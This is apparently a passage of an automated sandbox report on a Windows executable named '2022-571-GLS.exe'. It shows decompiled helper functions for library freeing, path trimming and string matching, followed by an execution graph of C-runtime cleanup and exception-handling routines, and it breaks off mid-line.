                          • Opcode ID: a9a9cd53ea9b16651c68b641742eb392f20282b9ff56190fccbee61235c86997
                          • Instruction ID: e5405207afdf9c80724cdb5948ae190fd13b5b366899adbc3f84073b9e1b6582
                          • Opcode Fuzzy Hash: a9a9cd53ea9b16651c68b641742eb392f20282b9ff56190fccbee61235c86997
                          • Instruction Fuzzy Hash: 2A116D71604209BBEF21AF52DD4199B3768AB503A5F00813BFA05791E1C7784992DFAD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004036B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004036B9() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f53c;
				_t3 = E0040369E(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f53c =  *0x41f53c & 0x00000000;
				return _t3;
			}







                          0x004036ba
                          0x004036c2
                          0x004036c9
                          0x004036cc
                          0x004036cc
                          0x004036ce
                          0x004036d3
                          0x004036da
                          0x004036e0
                          0x004036e4
                          0x004036e5
                          0x004036ed

                          APIs
                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,7476F560,00403690,00000000,00403482,00000000), ref: 004036D3
                          • GlobalFree.KERNEL32 ref: 004036DA
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004036CB
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: Free$GlobalLibrary
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 1100898210-3081826266
                          • Opcode ID: e38f7b7ef76e64d847b72dc92418a1a22abc338dac8168bb5d5fc62d2911f828
                          • Instruction ID: 7520a5cbb74b84659c3a5403b35965a418cfcd2fa6a259890695166e8a2f0d53
                          • Opcode Fuzzy Hash: e38f7b7ef76e64d847b72dc92418a1a22abc338dac8168bb5d5fc62d2911f828
                          • Instruction Fuzzy Hash: 53E08C3281142067C6315F0ABD0875A76AC6B45B26F018436E900B73A187756C438FDC
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00405835 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00405835(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                          0x00405836
                          0x00405840
                          0x00405842
                          0x00405849
                          0x00405851
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405851
                          0x00405853
                          0x00405858

                          APIs
                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CF4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\2022-571-GLS.exe,C:\Users\user\Desktop\2022-571-GLS.exe,80000000,00000003), ref: 0040583B
                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CF4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\2022-571-GLS.exe,C:\Users\user\Desktop\2022-571-GLS.exe,80000000,00000003), ref: 00405849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: CharPrevlstrlen
                          • String ID: C:\Users\user\Desktop
                          • API String ID: 2709904686-224404859
                          • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                          • Instruction ID: d70a425eade4063b78d7fa64a6a9160d8ae63170ea867be96e5b455a3914fe1f
                          • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                          • Instruction Fuzzy Hash: 01D05E634189A02EE30376509C04B8B6A48CF12340F198462E940A2190C2784C418BAD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00405947 Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00405947(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                          0x00405953
                          0x00405955
                          0x0040597d
                          0x00405962
                          0x00405967
                          0x00405972
                          0x00000000
                          0x0040598f
                          0x0040597b
                          0x0040597b
                          0x00000000

                          APIs
                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040594E
                          • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405967
                          • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405975
                          • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040597E
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: lstrlen$CharNextlstrcmpi
                          • String ID:
                          • API String ID: 190613189-0
                          • Opcode ID: b9005c049e247e33e5549b3e141599c62d2a38fed0f6fd2d3c1464f89547bebd
                          • Instruction ID: 50b9e356db97d407f8629b59342efd8dd4fdec4619503af860e0f04522e7a9f7
                          • Opcode Fuzzy Hash: b9005c049e247e33e5549b3e141599c62d2a38fed0f6fd2d3c1464f89547bebd
                          • Instruction Fuzzy Hash: C1F0A776209D51EFC2026B255C04D7BBF94EF91324B24057BF440F2180D3399815DBBB
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Execution Graph

                          Execution Coverage:1.5%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:2.7%
                          Total number of Nodes:1545
                          Total number of Limit Nodes:21
                          execution_graph 11751 bd41a1 11752 bd3dfd ___scrt_uninitialize_crt 79 API calls 11751->11752 11753 bd41a9 11752->11753 11761 bd7151 11753->11761 11755 bd41ae 11771 bd71fc 11755->11771 11758 bd41d8 11759 bd3723 ___free_lconv_mon 14 API calls 11758->11759 11760 bd41e3 11759->11760 11762 bd715d ___scrt_is_nonwritable_in_current_image 11761->11762 11775 bd25bd EnterCriticalSection 11762->11775 11764 bd71d4 11780 bd71f3 11764->11780 11766 bd71a8 DeleteCriticalSection 11769 bd3723 ___free_lconv_mon 14 API calls 11766->11769 11770 bd7168 11769->11770 11770->11764 11770->11766 11776 bd8b46 11770->11776 11772 bd41bd DeleteCriticalSection 11771->11772 11773 bd7213 11771->11773 11772->11755 11772->11758 11773->11772 11774 bd3723 ___free_lconv_mon 14 API calls 11773->11774 11774->11772 11775->11770 11777 bd8b59 ___std_exception_copy 11776->11777 11783 bd8c04 11777->11783 11779 bd8b65 ___std_exception_copy 11779->11770 11855 bd25d4 LeaveCriticalSection 11780->11855 11782 bd71e0 11782->11755 11784 bd8c10 ___scrt_is_nonwritable_in_current_image 11783->11784 11785 bd8c3d 11784->11785 11786 bd8c1a 11784->11786 11788 bd8c35 11785->11788 11794 bd40b1 EnterCriticalSection 11785->11794 11787 bd3982 ___std_exception_copy 29 API calls 11786->11787 11787->11788 11788->11779 11790 bd8c5b 11795 bd8b76 11790->11795 11792 bd8c68 11809 bd8c93 11792->11809 11794->11790 11796 bd8ba6 11795->11796 11797 bd8b83 11795->11797 11799 bd8b9e 11796->11799 11800 bd3e6b ___scrt_uninitialize_crt 75 API calls 11796->11800 11798 bd3982 ___std_exception_copy 29 API calls 11797->11798 11798->11799 11799->11792 11801 bd8bbe 11800->11801 11802 bd71fc 14 API calls 11801->11802 11803 bd8bc6 11802->11803 11804 bd6674 ___scrt_uninitialize_crt 29 API calls 11803->11804 11805 bd8bd2 11804->11805 11812 bd90f8 11805->11812 11808 bd3723 ___free_lconv_mon 14 API calls 11808->11799 11854 bd40c5 LeaveCriticalSection 11809->11854 11811 bd8c99 11811->11788 11813 bd9121 11812->11813 11816 bd8bd9 11812->11816 11814 bd9170 11813->11814 11817 bd9148 11813->11817 11815 bd3982 ___std_exception_copy 29 API calls 11814->11815 11815->11816 11816->11799 11816->11808 11819 bd919b 11817->11819 11820 bd91a7 ___scrt_is_nonwritable_in_current_image 11819->11820 11827 bd5e0e EnterCriticalSection 11820->11827 11822 bd91b5 11823 bd91e6 11822->11823 11828 bd9058 11822->11828 11841 bd9220 11823->11841 11827->11822 11829 bd5bc5 ___scrt_uninitialize_crt 29 API calls 11828->11829 11830 bd9068 11829->11830 11831 bd906e 11830->11831 11833 bd90a0 11830->11833 11834 bd5bc5 ___scrt_uninitialize_crt 29 API calls 11830->11834 11844 bd5c2f 11831->11844 11833->11831 11835 bd5bc5 ___scrt_uninitialize_crt 29 API calls 11833->11835 11836 bd9097 11834->11836 11837 bd90ac CloseHandle 11835->11837 11838 bd5bc5 ___scrt_uninitialize_crt 29 API calls 11836->11838 11837->11831 11839 bd90b8 GetLastError 11837->11839 11838->11833 11839->11831 11840 bd90c6 ___scrt_uninitialize_crt 11840->11823 11853 bd5e31 LeaveCriticalSection 11841->11853 11843 bd9209 11843->11816 11845 bd5ca5 11844->11845 11848 bd5c3e 11844->11848 11846 bd4844 ___free_lconv_mon 14 API calls 11845->11846 11847 bd5caa 11846->11847 11849 bd4857 ___scrt_uninitialize_crt 14 API calls 11847->11849 11848->11845 11852 bd5c68 11848->11852 11850 bd5c95 11849->11850 11850->11840 11851 bd5c8f SetStdHandle 11851->11850 11852->11850 11852->11851 11853->11843 11854->11811 11855->11782 11942 bd038d 11945 bd03b4 11942->11945 11946 bd03c0 ___scrt_is_nonwritable_in_current_image 11945->11946 11953 bd25bd EnterCriticalSection 11946->11953 11948 bd03ca 11949 bd03f8 11948->11949 11952 bd5030 ___scrt_uninitialize_crt 14 API calls 11948->11952 11954 bd0416 11949->11954 11952->11948 11953->11948 11957 bd25d4 LeaveCriticalSection 11954->11957 11956 bd03b2 11957->11956 9761 bcd1fe 9766 bcd780 SetUnhandledExceptionFilter 9761->9766 9763 bcd203 9767 bd0f64 9763->9767 9765 bcd20e 9766->9763 9768 bd0f8a 9767->9768 9769 bd0f70 9767->9769 9768->9765 9769->9768 9774 bd4844 9769->9774 9780 bd279d GetLastError 9774->9780 9776 bd0f7a 9777 bd37f6 9776->9777 10001 bd3a28 9777->10001 9779 bd0f85 9779->9765 9781 bd27b9 9780->9781 9782 bd27b3 9780->9782 9801 bd27bd SetLastError 9781->9801 9808 bd226e 9781->9808 9803 bd222f 9782->9803 9789 bd2803 9792 bd226e _unexpected 6 API calls 9789->9792 9790 bd27f2 9791 bd226e _unexpected 6 API calls 9790->9791 9800 bd2800 9791->9800 9793 bd280f 9792->9793 9794 bd282a 9793->9794 9795 bd2813 9793->9795 9826 bd295d 9794->9826 9797 bd226e _unexpected 6 API calls 9795->9797 9797->9800 9820 bd3723 9800->9820 9801->9776 9802 bd3723 ___free_lconv_mon 12 API calls 9802->9801 9831 bd2494 9803->9831 9805 bd224b 9806 bd2254 9805->9806 9807 bd2266 TlsGetValue 9805->9807 9806->9781 9809 bd2494 _unexpected 5 API calls 9808->9809 9810 bd228a 9809->9810 9811 bd22a8 TlsSetValue 9810->9811 9812 bd2293 9810->9812 9812->9801 9813 bd48d1 9812->9813 9819 bd48de _unexpected 9813->9819 9814 bd491e 9816 bd4844 ___free_lconv_mon 13 API calls 9814->9816 9815 bd4909 RtlAllocateHeap 9817 bd27ea 9815->9817 9815->9819 9816->9817 9817->9789 9817->9790 9819->9814 9819->9815 9845 bd3a5f 9819->9845 9821 bd372e HeapFree 9820->9821 9825 bd3758 9820->9825 9822 bd3743 GetLastError 9821->9822 9821->9825 9823 bd3750 ___free_lconv_mon 9822->9823 9824 bd4844 ___free_lconv_mon 12 API calls 9823->9824 9824->9825 9825->9801 9859 bd2ac3 9826->9859 9832 bd24c2 9831->9832 9836 bd24be _unexpected 9831->9836 9832->9836 9837 bd23c9 9832->9837 9835 bd24dc GetProcAddress 9835->9836 9836->9805 9843 bd23da ___vcrt_FlsFree 9837->9843 9838 bd23f8 LoadLibraryExW 9840 bd2477 9838->9840 9841 bd2413 GetLastError 9838->9841 9839 bd2470 9839->9835 9839->9836 9840->9839 9842 bd2489 FreeLibrary 9840->9842 9841->9843 9842->9839 9843->9838 9843->9839 9844 bd2446 LoadLibraryExW 9843->9844 9844->9840 9844->9843 9848 bd3a9b 9845->9848 9849 bd3aa7 ___scrt_is_nonwritable_in_current_image 9848->9849 9854 bd25bd EnterCriticalSection 9849->9854 9851 bd3ab2 9855 bd3aee 9851->9855 9854->9851 9858 bd25d4 LeaveCriticalSection 9855->9858 9857 bd3a6a 9857->9819 9858->9857 9860 bd2acf ___scrt_is_nonwritable_in_current_image 9859->9860 9873 bd25bd EnterCriticalSection 9860->9873 9862 bd2ad9 9874 bd2b09 9862->9874 9865 bd2b15 9866 bd2b21 ___scrt_is_nonwritable_in_current_image 9865->9866 9878 bd25bd EnterCriticalSection 9866->9878 9868 bd2b2b 9879 bd2912 9868->9879 9870 bd2b43 9883 bd2b63 9870->9883 9873->9862 9877 bd25d4 LeaveCriticalSection 9874->9877 9876 bd29cb 9876->9865 9877->9876 9878->9868 9880 bd2948 _unexpected 9879->9880 9881 bd2921 _unexpected 9879->9881 9880->9870 9881->9880 9886 bd4de4 9881->9886 10000 bd25d4 LeaveCriticalSection 9883->10000 9885 bd2835 9885->9802 9887 bd4dfa 9886->9887 9889 bd4e64 9886->9889 9887->9889 9891 bd4e2d 9887->9891 9896 bd3723 ___free_lconv_mon 14 API calls 9887->9896 9890 bd3723 ___free_lconv_mon 14 API calls 9889->9890 9913 bd4eb2 9889->9913 9892 bd4e86 9890->9892 9893 bd4e4f 9891->9893 9901 bd3723 ___free_lconv_mon 14 API calls 9891->9901 9894 bd3723 ___free_lconv_mon 14 API calls 9892->9894 9895 bd3723 ___free_lconv_mon 14 API calls 9893->9895 9897 bd4e99 9894->9897 9898 bd4e59 9895->9898 9900 bd4e22 9896->9900 9902 bd3723 ___free_lconv_mon 14 API calls 9897->9902 9904 bd3723 ___free_lconv_mon 14 API calls 9898->9904 9899 bd4f20 9905 bd3723 ___free_lconv_mon 14 API calls 9899->9905 9914 bd45d4 9900->9914 9907 bd4e44 9901->9907 9908 bd4ea7 9902->9908 9903 bd4ec0 9903->9899 9909 bd3723 14 API calls ___free_lconv_mon 9903->9909 9904->9889 9910 bd4f26 9905->9910 9942 bd46d2 9907->9942 9912 bd3723 ___free_lconv_mon 14 API calls 9908->9912 9909->9903 9910->9880 9912->9913 9954 bd4f7e 9913->9954 9915 bd45e5 9914->9915 9941 bd46ce 9914->9941 9916 bd45f6 9915->9916 9917 bd3723 ___free_lconv_mon 14 API calls 9915->9917 9918 bd4608 9916->9918 9919 bd3723 ___free_lconv_mon 14 API calls 9916->9919 9917->9916 9920 bd3723 ___free_lconv_mon 14 API calls 9918->9920 9922 bd461a 9918->9922 9919->9918 9920->9922 9921 bd3723 ___free_lconv_mon 14 API calls 9923 bd462c 9921->9923 9922->9921 9922->9923 9924 bd3723 ___free_lconv_mon 14 API calls 9923->9924 9925 bd463e 9923->9925 9924->9925 9926 bd4650 9925->9926 9927 bd3723 ___free_lconv_mon 14 API calls 9925->9927 9928 bd4662 9926->9928 9929 bd3723 ___free_lconv_mon 14 API calls 9926->9929 9927->9926 9930 bd4674 9928->9930 9931 bd3723 ___free_lconv_mon 14 API calls 9928->9931 9929->9928 9932 bd4686 9930->9932 9933 bd3723 ___free_lconv_mon 14 API calls 9930->9933 9931->9930 9934 bd4698 9932->9934 9935 bd3723 ___free_lconv_mon 14 API calls 9932->9935 9933->9932 9936 bd46aa 9934->9936 9937 bd3723 ___free_lconv_mon 14 API calls 9934->9937 9935->9934 9938 bd46bc 9936->9938 9939 bd3723 ___free_lconv_mon 14 API calls 9936->9939 9937->9936 9940 bd3723 ___free_lconv_mon 14 API calls 9938->9940 9938->9941 9939->9938 9940->9941 9941->9891 9943 bd46df 9942->9943 9944 bd4737 9942->9944 9945 bd46ef 9943->9945 9947 bd3723 ___free_lconv_mon 14 API calls 9943->9947 9944->9893 9946 bd4701 9945->9946 9948 bd3723 ___free_lconv_mon 14 API calls 9945->9948 9949 bd4713 9946->9949 9950 bd3723 ___free_lconv_mon 14 API calls 9946->9950 9947->9945 9948->9946 9951 bd4725 9949->9951 9952 bd3723 ___free_lconv_mon 14 API calls 9949->9952 9950->9949 9951->9944 9953 bd3723 ___free_lconv_mon 14 API calls 9951->9953 9952->9951 9953->9944 9955 bd4faa 9954->9955 9956 bd4f8b 9954->9956 9955->9903 9956->9955 9960 bd473b 9956->9960 9959 bd3723 ___free_lconv_mon 14 API calls 9959->9955 9961 bd4819 9960->9961 9962 bd474c 9960->9962 9961->9959 9996 bd481f 9962->9996 9965 bd481f _unexpected 14 API calls 9966 bd475f 9965->9966 9967 bd481f _unexpected 14 API calls 9966->9967 9968 bd476a 9967->9968 9969 bd481f _unexpected 14 API calls 9968->9969 9970 bd4775 9969->9970 9971 bd481f _unexpected 14 API calls 9970->9971 9972 bd4783 9971->9972 9973 bd3723 ___free_lconv_mon 14 API calls 9972->9973 9974 bd478e 9973->9974 9975 bd3723 ___free_lconv_mon 14 API calls 9974->9975 9976 bd4799 9975->9976 9977 bd3723 ___free_lconv_mon 14 API calls 9976->9977 9978 bd47a4 9977->9978 9979 bd481f _unexpected 14 API calls 9978->9979 9980 bd47b2 9979->9980 9981 bd481f _unexpected 14 API calls 9980->9981 9982 bd47c0 9981->9982 9983 bd481f _unexpected 14 API calls 9982->9983 9984 bd47d1 9983->9984 9985 bd481f _unexpected 14 API calls 9984->9985 9986 bd47df 9985->9986 9987 bd481f _unexpected 14 API calls 9986->9987 9988 bd47ed 9987->9988 9989 bd3723 ___free_lconv_mon 14 API calls 9988->9989 9990 bd47f8 9989->9990 9991 bd3723 ___free_lconv_mon 14 API calls 9990->9991 9992 bd4803 9991->9992 9993 bd3723 ___free_lconv_mon 14 API calls 9992->9993 9994 bd480e 9993->9994 9995 bd3723 ___free_lconv_mon 14 API calls 9994->9995 9995->9961 9997 bd4831 9996->9997 9998 bd4754 9997->9998 9999 bd3723 ___free_lconv_mon 14 API calls 9997->9999 9998->9965 9999->9997 10000->9885 10002 bd3a3a ___std_exception_copy 10001->10002 10005 bd3982 10002->10005 10004 bd3a52 ___std_exception_copy 10004->9779 10006 bd3999 10005->10006 10007 bd3992 10005->10007 10012 bd39a7 10006->10012 10018 bd39ff 10006->10018 10014 bd1550 GetLastError 10007->10014 10010 bd39ce 10010->10012 10021 bd3806 IsProcessorFeaturePresent 10010->10021 10012->10004 10013 bd39fe 10015 bd1569 10014->10015 10025 bd284e 10015->10025 10019 bd3a0a GetLastError SetLastError 10018->10019 10020 bd3a23 10018->10020 10019->10010 10020->10010 10022 bd3812 10021->10022 10047 bd383a 10022->10047 10026 bd2867 10025->10026 10027 bd2861 10025->10027 10028 bd226e _unexpected 6 API calls 10026->10028 10045 bd1585 SetLastError 10026->10045 10029 bd222f _unexpected 6 API calls 10027->10029 10030 bd2881 10028->10030 10029->10026 10031 bd48d1 _unexpected 14 API calls 10030->10031 10030->10045 10032 bd2891 10031->10032 10033 bd28ae 10032->10033 10034 bd2899 10032->10034 10036 bd226e _unexpected 6 API calls 10033->10036 10035 bd226e _unexpected 6 API calls 10034->10035 10037 bd28a5 10035->10037 10038 bd28ba 10036->10038 10043 bd3723 ___free_lconv_mon 14 API calls 10037->10043 10039 bd28cd 10038->10039 10040 bd28be 10038->10040 10042 bd295d _unexpected 14 API calls 10039->10042 10041 bd226e _unexpected 6 API calls 10040->10041 10041->10037 10044 bd28d8 10042->10044 10043->10045 10046 bd3723 ___free_lconv_mon 14 API calls 10044->10046 10045->10006 10046->10045 10048 bd3856 __CreateFrameInfo 10047->10048 10049 bd3882 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10048->10049 10050 bd3953 __CreateFrameInfo 10049->10050 10053 bcdb85 10050->10053 10052 bd3827 GetCurrentProcess TerminateProcess 10052->10013 10054 bcdb8d 10053->10054 10055 bcdb8e IsProcessorFeaturePresent 10053->10055 10054->10052 10057 bcdba8 10055->10057 10060 bcdc8d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10057->10060 10059 bcdc8b 10059->10052 10060->10059 11143 bd28f1 11144 bd28fc 11143->11144 11145 bd290c 11143->11145 11149 bd29f6 11144->11149 11148 bd3723 ___free_lconv_mon 14 API calls 11148->11145 11150 bd2a0b 11149->11150 11151 bd2a11 11149->11151 11152 bd3723 ___free_lconv_mon 14 API calls 11150->11152 11153 bd3723 ___free_lconv_mon 14 API calls 11151->11153 11152->11151 11154 bd2a1d 11153->11154 11155 bd3723 ___free_lconv_mon 14 API calls 11154->11155 11156 bd2a28 11155->11156 11157 bd3723 ___free_lconv_mon 14 API calls 11156->11157 11158 bd2a33 11157->11158 11159 bd3723 ___free_lconv_mon 14 API calls 11158->11159 11160 bd2a3e 11159->11160 11161 bd3723 ___free_lconv_mon 14 API calls 11160->11161 11162 bd2a49 11161->11162 11163 bd3723 ___free_lconv_mon 14 API calls 11162->11163 11164 bd2a54 11163->11164 11165 bd3723 ___free_lconv_mon 14 API calls 11164->11165 11166 bd2a5f 11165->11166 11167 bd3723 ___free_lconv_mon 14 API calls 11166->11167 11168 bd2a6a 11167->11168 11169 bd3723 ___free_lconv_mon 14 API calls 11168->11169 11170 bd2a78 11169->11170 11175 bd2b6f 11170->11175 11176 bd2b7b ___scrt_is_nonwritable_in_current_image 11175->11176 11191 bd25bd EnterCriticalSection 11176->11191 11179 bd2b85 11181 bd3723 ___free_lconv_mon 14 API calls 11179->11181 11182 bd2baf 11179->11182 11181->11182 11192 bd2bce 11182->11192 11183 bd2bda 11184 bd2be6 ___scrt_is_nonwritable_in_current_image 11183->11184 11196 bd25bd EnterCriticalSection 11184->11196 11186 bd2bf0 11187 bd2912 _unexpected 14 API calls 11186->11187 11188 bd2c03 11187->11188 11197 bd2c23 11188->11197 11191->11179 11195 bd25d4 LeaveCriticalSection 11192->11195 11194 bd2a9e 11194->11183 11195->11194 11196->11186 11200 bd25d4 LeaveCriticalSection 11197->11200 11199 bd2904 11199->11148 11200->11199 11279 bd2ecf 11284 bd2707 11279->11284 11285 bd2712 11284->11285 11289 bd2718 11284->11289 11287 bd222f _unexpected 6 API calls 11285->11287 11286 bd226e _unexpected 6 API calls 11288 bd2732 11286->11288 11287->11289 11290 bd271e 11288->11290 11291 bd48d1 _unexpected 14 API calls 11288->11291 11289->11286 11289->11290 11292 bd1c3c CallUnexpected 50 API calls 11290->11292 11293 bd2723 11290->11293 11294 bd2742 11291->11294 11295 bd279c 11292->11295 11309 bd3314 11293->11309 11296 bd275f 11294->11296 11297 bd274a 11294->11297 11299 bd226e _unexpected 6 API calls 11296->11299 11298 bd226e _unexpected 6 API calls 11297->11298 11300 bd2756 11298->11300 11301 bd276b 11299->11301 11306 bd3723 ___free_lconv_mon 14 API calls 11300->11306 11302 bd276f 11301->11302 11303 bd277e 11301->11303 11304 bd226e _unexpected 6 API calls 11302->11304 11305 bd295d _unexpected 14 API calls 11303->11305 11304->11300 11307 bd2789 11305->11307 11306->11290 11308 bd3723 ___free_lconv_mon 14 API calls 11307->11308 11308->11293 11310 bd333e 11309->11310 11331 bd31a0 11310->11331 11313 bd492e 15 API calls 11314 bd3368 11313->11314 11315 bd337e 11314->11315 11316 bd3370 11314->11316 11338 bd2f98 11315->11338 11317 bd3723 ___free_lconv_mon 14 API calls 11316->11317 11319 bd2f09 11317->11319 11321 bd33b6 11322 bd4844 ___free_lconv_mon 14 API calls 11321->11322 11324 bd33bb 11322->11324 11323 bd33fd 11326 bd3446 11323->11326 11349 bd36d6 11323->11349 11327 bd3723 ___free_lconv_mon 14 API calls 11324->11327 11325 bd33d1 11325->11323 11328 bd3723 ___free_lconv_mon 14 API calls 11325->11328 11330 bd3723 ___free_lconv_mon 14 API calls 11326->11330 11327->11319 11328->11323 11330->11319 11357 bd2f16 11331->11357 11334 bd31c1 GetOEMCP 11337 bd31ea 11334->11337 11335 bd31d3 11336 bd31d8 GetACP 11335->11336 11335->11337 11336->11337 11337->11313 11337->11319 11339 bd31a0 52 API calls 11338->11339 11340 bd2fb8 11339->11340 11341 bd3031 __CreateFrameInfo 11340->11341 11342 bd2ff5 IsValidCodePage 11340->11342 11343 bcdb85 TranslatorGuardHandler 5 API calls 11341->11343 11342->11341 11344 bd3007 11342->11344 11345 bd319e 11343->11345 11346 bd3036 GetCPInfo 11344->11346 11348 bd3010 __CreateFrameInfo 11344->11348 11345->11321 11345->11325 11346->11341 11346->11348 11398 bd352a 11348->11398 11350 bd36e2 ___scrt_is_nonwritable_in_current_image 11349->11350 11482 bd25bd EnterCriticalSection 11350->11482 11352 bd36ec 11483 bd3469 11352->11483 11358 bd2f2d 11357->11358 11359 bd2f34 11357->11359 11358->11334 11358->11335 11359->11358 11360 bd264c _unexpected 50 API calls 11359->11360 11361 bd2f55 11360->11361 11365 bd5eec 11361->11365 11366 bd5eff 11365->11366 11367 bd2f6b 11365->11367 11366->11367 11373 bd4faf 11366->11373 11369 bd5f19 11367->11369 11370 bd5f2c 11369->11370 11371 bd5f41 11369->11371 11370->11371 11395 bd2ebb 11370->11395 11371->11358 11374 bd4fbb ___scrt_is_nonwritable_in_current_image 11373->11374 11375 bd264c _unexpected 50 API calls 11374->11375 11376 bd4fc4 11375->11376 11383 bd500a 11376->11383 11386 bd25bd EnterCriticalSection 11376->11386 11378 bd4fe2 11387 bd5030 11378->11387 11383->11367 11384 bd1c3c CallUnexpected 50 API calls 11385 bd502f 11384->11385 11386->11378 11388 bd4ff3 11387->11388 11389 bd503e _unexpected 11387->11389 11391 bd500f 11388->11391 11389->11388 11390 bd4de4 _unexpected 14 API calls 11389->11390 11390->11388 11394 bd25d4 LeaveCriticalSection 11391->11394 11393 bd5006 11393->11383 11393->11384 11394->11393 11396 bd264c _unexpected 50 API calls 11395->11396 11397 bd2ec0 11396->11397 11397->11371 11399 bd3552 GetCPInfo 11398->11399 11400 bd361b 11398->11400 11399->11400 11405 bd356a 11399->11405 11402 bcdb85 TranslatorGuardHandler 5 API calls 11400->11402 11404 bd36d4 11402->11404 11404->11341 11409 bd4b61 11405->11409 11408 bd630f 54 API calls 11408->11400 11410 bd2f16 50 API calls 11409->11410 11411 bd4b81 11410->11411 11429 bd4c6a 11411->11429 11413 bd4c45 11416 bcdb85 